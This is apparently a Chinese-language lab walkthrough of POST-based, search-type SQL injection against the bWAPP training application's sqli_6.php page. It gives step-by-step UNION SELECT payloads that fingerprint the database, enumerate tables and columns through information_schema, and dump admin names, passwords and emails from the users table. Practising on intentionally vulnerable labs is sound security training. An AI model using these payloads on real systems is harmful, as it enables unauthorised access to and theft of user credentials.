標籤:bWAPP之sqli_6.php
1、POST型注入就要先找到POST參數,在搜尋方塊輸入“1”後提交,按F12查看審查元素,找到“網路”,再點擊POST項,接著點擊右邊的“參數”,查看POST的參數為“title”,如:
2、開始構造,在hackbar的POST欄裡輸入“title=1‘”,提交,返回的報錯含有“%”,所以可以確定是搜尋型注入。結果如:
輸入“title=1%‘and‘%‘=‘”,沒有報錯,說明是搜尋型注入,結果如:
3、判斷欄位數:
輸入“title=1%‘order by 7 #+”正常;輸入“title=1%‘order by 8 #+”報錯,說明欄位數為7,這裡注釋用“#”正常,用“--”會報錯,我不知道為什麼,結果如:
查看顯示位置,輸入“title=1%‘union select 1,2,3,4,5,6,7 #+”,結果
4、查詢資料庫等資訊:
輸入“title=1%‘union select 1,database(),version(),4,user(),6,7 #+”,查詢資料庫名、資料庫版本、目前使用者,結果
5、查詢表名:
輸入“title=1%‘union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘ #+”,較重要的是users表,結果
6、查詢欄位名:
輸入“title=1%‘union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘users‘ #+”,較重要的欄位名有admin、password、email,結果
7、查詢欄位內容:
輸入“title=1%‘union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users #+”,結果
同樣,有興趣可以試試其他表和欄位。
SQL注入之bWAPP之sqli_6.php